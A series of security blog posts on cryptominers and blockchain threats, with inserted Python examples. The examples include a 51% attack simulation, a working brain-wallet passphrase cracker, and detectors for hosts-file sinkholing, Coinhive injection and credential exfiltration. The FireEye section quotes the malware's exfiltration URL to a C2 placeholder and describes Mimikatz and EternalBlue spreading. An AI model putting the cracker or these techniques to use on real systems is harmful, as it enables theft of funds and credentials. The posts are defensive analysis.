Nevertheless, it is quite worrying that anti-analysis techniques are becoming this mainstream, so much so that they are turning into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully this is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Below are the hashes related to this analysis, the mutex identifying this specific strain, and the XMR wallet:

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Blockchain 101: What Consumers Need to Know About the Technology

From Bitcoin’s boom to high-stakes hacks, cryptocurrency, and how to secure it, has been the talk of the town. However, what most don’t realize is that there is a sophisticated technology behind each cryptocurrency transaction, designed to secure digital currency: blockchain. Now, many of you may be asking: what exactly is blockchain? Let’s take a look at how this technology actually works and what the security implications may be for consumers.

What is blockchain?

According to the recent McAfee Blockchain Threat Report, “a blockchain is a series of records or transactions, collected together in a block that defines a portion of a ledger. The ledger is distributed among peers, who use it as a trusted authority in which records are valid. Each block in the ledger is linked to its next block, creating a chain—hence the name.” With blockchain, anyone can look at the latest blocks and their “parent” blocks to determine the state of an address. It also addresses problems that arise with purely digital money, such as double spending and counterfeiting.

Remaining cautious with blockchain

Blockchain is essentially the secret weapon behind cryptocurrency’s popularity, as it has been positioned as the technology that will address digital currency’s security issues. While it has great potential, there are risks that could hinder its growth. For instance, the many cryptocurrency hacks we have seen recently show that the ecosystem around blockchain is not foolproof: most of them hit exchanges, wallets and the code built on top of the ledger rather than the ledger itself, and the core mechanism has known weaknesses of its own. This is a friendly reminder that we still need to be cautious in how we view this technology as it relates to security. Remember that blockchain is created by people, who make mistakes.

Therefore, it’s important we all remain cautious when it comes to treating this technology like the end all be all. So, if you’re considering using blockchain technology to secure your cryptocurrency, be sure to follow these tips:

  • Don’t put all your eggs in one basket. Diversification is king when it comes to cryptocurrency. Since blockchain isn’t a sure-fire way of securing cryptocurrency transactions, do your research on the various “coins” out there and select a variety of currency types, so that if one cryptocurrency is attacked you still have others to fall back on.
  • Always have a plan B. Keep a paper record of your transactions so that they are not bound to something that is prone to human error. That way, if something does go wrong with the blockchain, your important transactions are still documented elsewhere.
  • Do your homework. With blockchain, and any new and emerging technology really, always remain a bit skeptical. Do your homework before you embrace the technology: research your options and make sure there have been no security issues.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Blockchain 101: What Consumers Need to Know About the Technology appeared first on McAfee Blogs.

Malicious Actors Generated $175 Million in Monero Via Cryptocurrency Mining, Report Reveals

Criminals have earned a total of $175 million in Monero through malicious cryptocurrency mining, according to a recent study. These illicit profits represent 5 percent of all Monero in circulation today.

This surge is largely due to cybercriminals’ preference for the currency and the rapid proliferation of crypto-mining malware, the study found. However, because JavaScript and other web-based mining was not included in the research, the report’s authors noted that the true figure is likely much higher.

Monero: Cybercriminals’ Favorite Digital Currency

For the report, Palo Alto Networks used a threat analysis service to determine which digital currencies malicious actors prefer to mine and how lucrative the activity is. Of the 629,126 malware samples included in the research, 531,663 (approximately 85 percent) delivered software designed to mine Monero. This figure dwarfed that of bitcoin, which came second with 53,615 samples.

Monero’s dominance extended to the number of wallets observed in the dataset. In total, the researchers identified 2,341 Monero wallets, which was more than twice the amount of bitcoin wallets at 981. By comparison, Electroneum, Ethereum and Litecoin were barely represented at just 131, 44 and 28 wallets, respectively.

In addition, the researchers identified 3,773 emails used to connect to mining pools and 2,995 mining pool URLs.

Addressing the Cryptocurrency Mining Threat

Josh Grunzweig, senior malware researcher at Palo Alto Networks, noted that it’s difficult to defeat cryptocurrency mining software delivered by malware.

“Many malware authors will limit the CPU utilization, or ensure that mining operations only take place during specific times of the day or when the user is inactive,” Grunzweig explained. “Additionally, the malware itself is delivered via a large number of methods, requiring defenders to have an in-depth approach to security.”

To help organizations protect themselves, Palo Alto published all the Monero wallets and the hashes of all malicious samples it identified in its research.

The post Malicious Actors Generated $175 Million in Monero Via Cryptocurrency Mining, Report Reveals appeared first on Security Intelligence.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19, researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that could lead to remote control over participating nodes. Just four days earlier, a mining pool server for the IoT platform HDAC was compromised, affecting the vast majority of its miners. In January, the largest-ever theft of cryptocurrency occurred at the exchange Coincheck, resulting in the loss of US$532 million in NEM coins. Because of its increased popularity and profitability, cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors are phishing, malware, implementation vulnerabilities, and attacks on the core technology itself. In January, IOTA users lost $4 million to a phishing scheme that had run for several months. Malware authors often change their focus: from late 2017 into early 2018 some migrated from deploying ransomware to cryptomining, using open-source code such as XMRig for system-based mining and the browser mining service Coinhive.

Implementation vulnerabilities are flaws introduced when new technologies and tools are built on top of a blockchain. The recent EOS attack is one example. In mid-July 2017, IOTA suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found to have numerous vulnerabilities; attackers exploiting them were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much harder to carry out, although they are not unheard of. The most widely known is the 51% attack, or majority attack: an attacker who controls a majority of the network’s hashing power can mine a private chain faster than the honest network, publish it once it is longer, and thereby rewrite recent history, including reversing their own payments. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, the Sybil attack, has an attacker run many fake peer identities so that a victim’s node connects only to attacker-controlled peers and sees only the attacker’s view of the ledger, which can give the attacker complete control over what that victim accepts. Attempts at larger-scale Sybil attacks have been made, such as one in 2016.
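To make the ledger and majority-attack descriptions concrete (the definition under What is Blockchain? and the 51% attack above), here is an added Python toy that is not from the McAfee report: a hash-linked chain with proof of work, a validator that rejects any tampered or unlinked block, and a majority attacker who mines a private fork from the genesis block that omits a payment and, being longer, wins under the longest-chain rule. The difficulty (12 bits), the transactions and the party names are assumptions chosen so the demo runs in a fraction of a second; real networks adjust difficulty and compare accumulated work rather than raw length, which changes nothing here because every block carries the same work.

```python
import copy
import hashlib
import json
from typing import List, Tuple

DIFFICULTY_BITS = 12   # toy target (12 leading zero bits); an assumption so mining is instant
GENESIS_PREV = "0" * 64


class Block:
    def __init__(self, index: int, prev_hash: str, txs: List[dict], nonce: int = 0):
        self.index, self.prev_hash, self.txs, self.nonce = index, prev_hash, txs, nonce

    def header(self) -> str:
        # Everything the hash must commit to: position, parent hash, contents, nonce.
        return json.dumps([self.index, self.prev_hash, self.txs, self.nonce], sort_keys=True)

    def hash(self) -> str:
        return hashlib.sha256(self.header().encode()).hexdigest()


def meets_target(digest_hex: str) -> bool:
    return int(digest_hex, 16) >> (256 - DIFFICULTY_BITS) == 0


def mine(block: Block) -> Block:
    """Proof of work: try nonces until the header hash falls below the target."""
    while not meets_target(block.hash()):
        block.nonce += 1
    return block


def valid_chain(chain: List[Block]) -> bool:
    """A chain is valid when every block sits at its index, carries valid proof of
    work, and names its parent's current hash; editing any block breaks the links."""
    if not chain or chain[0].prev_hash != GENESIS_PREV:
        return False
    for i, blk in enumerate(chain):
        if blk.index != i or not meets_target(blk.hash()):
            return False
        if i and blk.prev_hash != chain[i - 1].hash():
            return False
    return True


def extend(chain: List[Block], txs: List[dict]) -> List[Block]:
    return chain + [mine(Block(len(chain), chain[-1].hash(), txs))]


def contains_tx(chain: List[Block], txid: str) -> bool:
    return any(tx["id"] == txid for blk in chain for tx in blk.txs)


def choose_chain(a: List[Block], b: List[Block]) -> List[Block]:
    """Longest-chain rule; with uniform difficulty, length equals accumulated work."""
    return a if len(a) >= len(b) else b


def tampered_copy(chain: List[Block], index: int, amount: int) -> List[Block]:
    """Edit one transaction after the fact (without re-mining) to show the validator catches it."""
    forged = copy.deepcopy(chain)
    forged[index].txs[0]["amount"] = amount
    return forged


def build_demo() -> Tuple[List[Block], List[Block]]:
    """Honest chain: genesis, alice pays bob (tx1), bob pays carol (tx2).
    Majority attacker: mines privately from genesis, replaces tx1 with a payment
    to himself, and keeps mining until his fork is longer than the honest one."""
    genesis = mine(Block(0, GENESIS_PREV, []))
    honest = extend([genesis], [{"id": "tx1", "from": "alice", "to": "bob", "amount": 10}])
    honest = extend(honest, [{"id": "tx2", "from": "bob", "to": "carol", "amount": 3}])
    attack = extend([genesis], [{"id": "tx1b", "from": "alice", "to": "alice2", "amount": 10}])
    attack = extend(attack, [])
    attack = extend(attack, [])      # one block more than the honest chain: the majority wins
    return honest, attack


if __name__ == "__main__":
    honest, attack = build_demo()
    print("honest valid:", valid_chain(honest), "attack valid:", valid_chain(attack))
    winner = choose_chain(honest, attack)
    print("network adopts attacker's fork:", winner is attack, "tx1 still present:", contains_tx(winner, "tx1"))
    print("tampered honest chain valid:", valid_chain(tampered_copy(honest, 1, 1000)))
```

The two results to notice: the validator catches any edit to an already-mined block, because the edit changes that block's hash and every descendant's prev_hash no longer matches, yet it happily accepts the attacker's fork, which is internally perfectly valid. Proof of work protects history only as long as the honest majority keeps out-mining everyone else; it is not a guarantee that the chain you saw yesterday is the chain everyone agrees on today.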

Dictionary Attacks

Blockchain may be a relatively new technology, but that does not mean old attacks cannot work against it. Mostly because of insecure user behavior, dictionary attacks succeed against some blockchain wallets. Brain wallets, whose private key is derived directly from a user-chosen passphrase, are insecure whenever the passphrase is guessable, yet people still use them. These wallets are routinely emptied, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes.
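As an added example of why brain wallets fail (illustrative code, not anything from the McAfee report), the Python below implements the classic scheme, private key = SHA-256(passphrase), with secp256k1 point multiplication in pure Python, then does what a thief does: precomputes the public key for every passphrase in a wordlist once and matches any wallet whose key shows up, which is why funds sent to such a wallet are swept within minutes. The wordlist is constructed for the demo. The final Bitcoin address step (SHA-256, then RIPEMD-160, then Base58Check) is omitted because RIPEMD-160 is not guaranteed to be available in Python's hashlib; matching on the public key, which is revealed when the wallet spends, makes the same point.

```python
import hashlib
from typing import Dict, Iterable, Optional, Tuple

# secp256k1 domain parameters (the curve Bitcoin uses)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

Point = Optional[Tuple[int, int]]   # None represents the point at infinity


def point_add(p: Point, q: Point) -> Point:
    """Affine addition on y^2 = x^3 + 7 over GF(P); handles doubling and inverses."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                     # p == -q
    if p == q:
        lam = 3 * x1 * x1 * pow(2 * y1, P - 2, P) % P   # tangent slope
    else:
        lam = (y2 - y1) * pow((x2 - x1) % P, P - 2, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k: int, point: Point = G) -> Point:
    """Double-and-add. Not constant time, which is fine for the attacker's side shown here."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def compress(point: Tuple[int, int]) -> bytes:
    """SEC1 compressed encoding: 02/03 prefix by y parity, then x."""
    x, y = point
    return (b"\x02" if y % 2 == 0 else b"\x03") + x.to_bytes(32, "big")


def brainwallet_private_key(passphrase: str) -> int:
    """The classic brain-wallet scheme: one unsalted, unstretched SHA-256 of the passphrase."""
    return int.from_bytes(hashlib.sha256(passphrase.encode("utf-8")).digest(), "big")


def brainwallet_public_key(passphrase: str) -> bytes:
    return compress(scalar_mult(brainwallet_private_key(passphrase) % N))


def precompute(wordlist: Iterable[str]) -> Dict[bytes, str]:
    """Attacker side: one curve multiplication per candidate, computed once, reused forever."""
    return {brainwallet_public_key(w): w for w in wordlist}


def crack(observed_pubkey: bytes, table: Dict[bytes, str]) -> Optional[str]:
    """O(1) lookup from a public key seen on chain back to the passphrase that owns it."""
    return table.get(observed_pubkey)


# Constructed wordlist for the demo; a real attacker uses millions of phrases, lyrics, quotes.
WORDLIST = ["password", "correct horse battery staple", "letmein", "bitcoin",
            "satoshi nakamoto", "to be or not to be"]

if __name__ == "__main__":
    table = precompute(WORDLIST)
    victim = brainwallet_public_key("correct horse battery staple")
    print("victim pubkey:", victim.hex())
    print("passphrase recovered:", crack(victim, table))
```

Nothing here is a weakness of the curve: 2^256 candidate keys is unassailable, but a human-chosen passphrase lives in a space of millions, and a single unsalted hash means one precomputation serves every brain wallet on the network at once. Salted, heavily stretched derivations (or simply random keys) are what remove the dictionary from the picture.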

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which users create accounts, manage finances, and even trade currencies, including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well: Bitcurex abruptly closed, leading to an official investigation into the circumstances, and Youbit suffered two attacks that drove the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.


Blockchain technologies and their users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain, so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

Parasitic Coin Mining Creates Wealth, Destroys Systems

The increasing popularity of cryptocurrencies has inspired some people to pursue coin mining, essentially making money online. (Mining is the processing of transactions in the digital currency system, in which new transactions are recorded in a digital ledger called the blockchain. Miners help to update the ledger to verify and collect new transactions to be added to the blockchain. In return, miners earn Bitcoins, for example.) Mining is resource intensive and legal if it is done with the proper permissions.

McAfee Labs has recently seen a huge increase in a malware variant, commonly known as CoinMiner or CoinMiner-FOZU!, which takes control of a victim’s computer to mine new coins by infecting user executables, injecting Coinhive JavaScript into HTML files, and blocking the domains of security products to stop signature updates.

CoinMiner-FOZU!, which we analyzed, has led all major coin-miner malware in prevalence in 2018. (March figures are incomplete.) Source: McAfee Labs.

The following graphs show statistics and geographic data for recent CoinMiner-FOZU! detections:

W32/CoinMiner employs—without a user’s consent—machine resources to mine coins for virtual currencies. Its parasitic nature makes it rare as well as destructive: The malware does not put a unique marker on each file it infects. Thus subsequent infections by the same malware will reinfect the victim’s files.


After launching, CoinMiner copies itself into two hardcoded locations:

  • %Windows%\360\360Safe\deepscan\ZhuDongFangYu.exe
  • %filesystemroot%:\RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe

These two files are hidden and read only:

The binary executes from the first location and starts the parasitic infection process. The malware prepends itself to user-executable files but, unlike traditional file infectors, it does not allow the original file to run. It targets files with extensions .exe, .com, .scr, and .pif. This malware does not check for multiple infections. If the threat is deleted and later reinfects the system, the same files will again be targeted.

To prevent victims from restoring clean copies of their files, the malware deletes both ISO (disk image) and GHO (Norton Ghost) files:


Once CoinMiner finishes infecting other executable files, it injects a Coinhive script into HTML files. The Coinhive service provides cryptocurrency mining software in the form of JavaScript code that can be embedded in a website and uses each visitor’s processing power to mine the cryptocurrency:

CoinMiner disables the user account control feature, which notifies the user when applications make changes to the system. Through registry updates, it also disables folder options and registry tools, and deletes safe mode.

From its second location on an infected system—the hidden autorun.inf at the file system root—the malware ensures that it starts after rebooting:

To avoid detection by security products, CoinMiner adds security software domains to the hosts file and redirects them to the loopback address on the victim’s system. If users have not created a local website, they will see an error page in their browsers. By doing this, the malware ensures that no victim can receive an update from the security vendor.

When the victim opens a script-injected HTML file, the Coinhive script executes, downloading coinhive.min.js (hash: 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382) from its remote source. This script takes over 100% of the CPU for mining by calling the function setThrottle(0). The mining stops when the victim closes the infected HTML file:

The simple hosts-file injection, hiding in the recycle bin, and maximizing CPU usage suggest that this malware has been written by a novice author. McAfee advises all users to keep their antimalware products up to date.
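Two of the artifacts described above, the poisoned hosts file and the injected Coinhive loader, are easy for a defender to audit. The following Python is an added example, not McAfee’s code or part of the original post; the hosts file, the HTML page, the vendor domains (all under the reserved .test TLD) and the site key are constructed placeholders, and the script names and the setThrottle(0) call are the indicators the post itself names.

```python
import re

# Constructed sample hosts file (not from an infected system), modelled on the
# behaviour described above: vendor update domains pinned to the loopback address.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       update.example-av.test
127.0.0.1       downloads.example-security.test
0.0.0.0         liveupdate.example-vendor.test
192.0.2.10      intranet.corp.test
"""

# Constructed HTML page carrying a Coinhive loader of the kind the post describes.
SAMPLE_HTML = """\
<html><head><title>Quarterly report</title>
<script src="coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITEKEY-PLACEHOLDER');
miner.setThrottle(0);
miner.start();
</script></head><body>report body</body></html>
"""

# Placeholder list of update domains that must never resolve locally; replace
# with the update hosts of the security products actually deployed.
PROTECTED_DOMAINS = {
    "update.example-av.test",
    "downloads.example-security.test",
    "liveupdate.example-vendor.test",
}

# Addresses that black-hole a name: IPv4 and IPv6 loopback plus the unspecified address.
SINKHOLE_ADDRS = {"127.0.0.1", "::1", "0.0.0.0"}


def find_sinkholed_domains(hosts_text, protected=PROTECTED_DOMAINS):
    """Return (address, hostname) pairs for protected domains that a hosts
    file pins to a loopback or unspecified address."""
    hits = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            if name.lower() in protected and addr in SINKHOLE_ADDRS:
                hits.append((addr, name.lower()))
    return hits


# Indicators of the injected loader: the script file name, the Coinhive API
# constructor, and the setThrottle(0) call that claims the whole CPU.
MINER_PATTERNS = {
    "coinhive_script": re.compile(r"coinhive\.min\.js", re.I),
    "coinhive_api": re.compile(r"\bCoinHive\.(Anonymous|User)\s*\(", re.I),
    "full_throttle": re.compile(r"\.setThrottle\s*\(\s*0\s*\)", re.I),
}


def html_miner_indicators(html_text):
    """Return the names of miner indicators found in an HTML document."""
    return [name for name, pat in MINER_PATTERNS.items() if pat.search(html_text)]


if __name__ == "__main__":
    for addr, name in find_sinkholed_domains(SAMPLE_HOSTS):
        print(f"hosts file pins {name} to {addr}; updates for that product will fail")
    for indicator in html_miner_indicators(SAMPLE_HTML):
        print("miner indicator in HTML:", indicator)
```

The hosts check treats 0.0.0.0 the same as 127.0.0.1 because both silently break name resolution for the pinned domain; running it against the live hosts file of a Windows host is a cheap way to confirm that update traffic can still reach the vendor.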

McAfee Detections

  • W32/CoinMiner
  • CoinMiner-FOZU![Partial hash]
  • TXT/CoinMiner.m
  • HTML/CoinMiner.m
  • JS/Miner.c

Hashes (SHA-256)

  • 80568db643de5f429e9ad5e2005529bc01c4d7da06751e343c05fa51f537560d
  • bb987f37666b6e8ebf43e443fc4bacd5f0ab795194f20c01fcd10cb582da1c57
  • 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382

The post Parasitic Coin Mining Creates Wealth, Destroys Systems appeared first on McAfee Blogs.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connecting to mining pools with a wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
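The miner flags and the scheduled-task names listed under Tactic #2 are the kind of strings a responder pulls out of process and task listings during triage. The Python below is an added example, not FireEye’s code or part of the original post: it parses a constructed miner command line (the path, pool host, wallet and algorithm name are placeholders) into the flags the post enumerates, and matches task names against the “Update service for Oracle products” stem that both quoted task names share. The stratum+tcp / stratum+ssl URL scheme used to recognise a pool is the common pool convention and is assumed here rather than quoted from the post.

```python
import re

# Option letters the post lists for the miner: -a algorithm, -k keepalive,
# -o pool URL, -u wallet, -p pool password, -t thread count.
VALUE_FLAGS = {"-a": "algorithm", "-o": "pool", "-u": "wallet",
               "-p": "password", "-t": "threads"}
BOOL_FLAGS = {"-k": "keepalive"}

# Constructed command line in the shape the post describes; the path, pool
# host, algorithm and wallet are placeholders, not observed values.
SAMPLE_CMDLINE = (r'"C:\Windows\Temp\miner.exe" -a cryptonight -k '
                  r'-o stratum+tcp://pool.example.test:3333 -u WALLET-PLACEHOLDER -p x -t 2')

# Task names quoted in the post differ only in a trailing character, so match
# the shared stem rather than either exact string.
TASK_NAME_RE = re.compile(r"^Update service for Oracle products.?$", re.I)


def _tokens(cmdline):
    """Split on whitespace but keep double-quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_cmdline(cmdline):
    """Parse a miner command line into the flags the post describes.
    Unknown tokens are kept under 'other' rather than silently dropped."""
    argv = _tokens(cmdline)
    info = {"binary": argv[0] if argv else "", "other": []}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_FLAGS and i + 1 < len(argv):
            info[VALUE_FLAGS[tok]] = argv[i + 1]
            i += 2
        elif tok in BOOL_FLAGS:
            info[BOOL_FLAGS[tok]] = True
            i += 1
        else:
            info["other"].append(tok)
            i += 1
    return info


def looks_like_pool_connection(info):
    """True when a parsed command line names a stratum pool and a wallet.
    The stratum+tcp / stratum+ssl scheme is the usual pool convention
    (an assumption here, not a value quoted in the post)."""
    pool = info.get("pool", "")
    return pool.startswith(("stratum+tcp://", "stratum+ssl://")) and "wallet" in info


def suspicious_task_names(task_names):
    """Return scheduled task names matching the persistence task the post names."""
    return [n for n in task_names if TASK_NAME_RE.match(n)]


if __name__ == "__main__":
    parsed = parse_miner_cmdline(SAMPLE_CMDLINE)
    print("pool:", parsed.get("pool"), "threads:", parsed.get("threads"),
          "pool connection:", looks_like_pool_connection(parsed))
    print(suspicious_task_names(["Update service for Oracle products1",
                                 "GoogleUpdateTaskMachineCore"]))
```

Feeding process command lines from an EDR export through parse_miner_cmdline gives the pool host and wallet to block and search for across the estate; the task-name match is deliberately loose because, as Figures 4 and 5 show, competing variants vary only the last character.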

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it’s running on a 32-bit or 64-bit system to determine which PowerShell script to fetch from the command and control (C2) server. It enumerates every network adapter, aggregating the destination IPs of all established non-loopback network connections. Each IP address is then tested with the extracted credentials: a credential-based PowerShell execution is attempted that downloads and runs the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to check whether that host is vulnerable to EternalBlue, and uses the exploit to spread to it.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.
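The exfiltration channel described above, an HTTP GET to http://<C2>:8000/api.php?data=<credential data>, is a concrete shape to hunt for in proxy or NetFlow-with-URL logs. The following Python is an added example, not FireEye’s code or part of the original post. The log format (timestamp, client, method, URL, status) and every address in it are constructed: clients are private RFC 1918 addresses, the C2 is in the 203.0.113.0/24 documentation range, hostnames use the reserved .test TLD, and the payload is a base64-encoded placeholder, not credential data.

```python
import base64
from urllib.parse import urlsplit, parse_qs

# Constructed payload standing in for the credential blob; not real data.
EXFIL_BLOB = base64.urlsafe_b64encode(b"CREDENTIAL-DATA-PLACEHOLDER").decode()

# Constructed proxy log: timestamp, client, method, URL, status. Addresses
# come from the documentation ranges and the .test TLD.
SAMPLE_PROXY_LOG = f"""\
2018-01-20T10:00:01Z 10.0.0.5 GET http://intranet.corp.test/api.php?data=ping 200
2018-01-20T10:00:07Z 10.0.0.5 GET http://203.0.113.7:8000/api.php?data={EXFIL_BLOB} 200
2018-01-20T10:00:09Z 10.0.0.8 GET http://updates.example-vendor.test/catalog.xml 304
2018-01-20T10:00:12Z 10.0.0.5 POST http://203.0.113.7:8000/api.php 200
"""


def find_credential_exfil(log_text, port=8000, min_len=20):
    """Flag GET requests to <host>:<port>/api.php that carry a long 'data'
    query value, the shape the post reports for credential exfiltration.
    A short value (a health-check 'ping', say) is ignored to limit noise."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, _status = line.split()
        parts = urlsplit(url)
        if method != "GET" or parts.path != "/api.php" or parts.port != port:
            continue
        data = parse_qs(parts.query).get("data", [""])[0]
        if len(data) >= min_len:
            hits.append({"ts": ts, "client": client,
                         "c2": parts.hostname, "bytes": len(data)})
    return hits


if __name__ == "__main__":
    for hit in find_credential_exfil(SAMPLE_PROXY_LOG):
        print(f"{hit['ts']} {hit['client']} -> {hit['c2']}:{8000} "
              f"api.php data={hit['bytes']} bytes")
```

A hit here identifies the internal host that was harvested with Mimikatz as much as the C2, so the client address is the more valuable field for incident scoping: it is the machine whose credentials must be considered compromised and rotated.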

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.
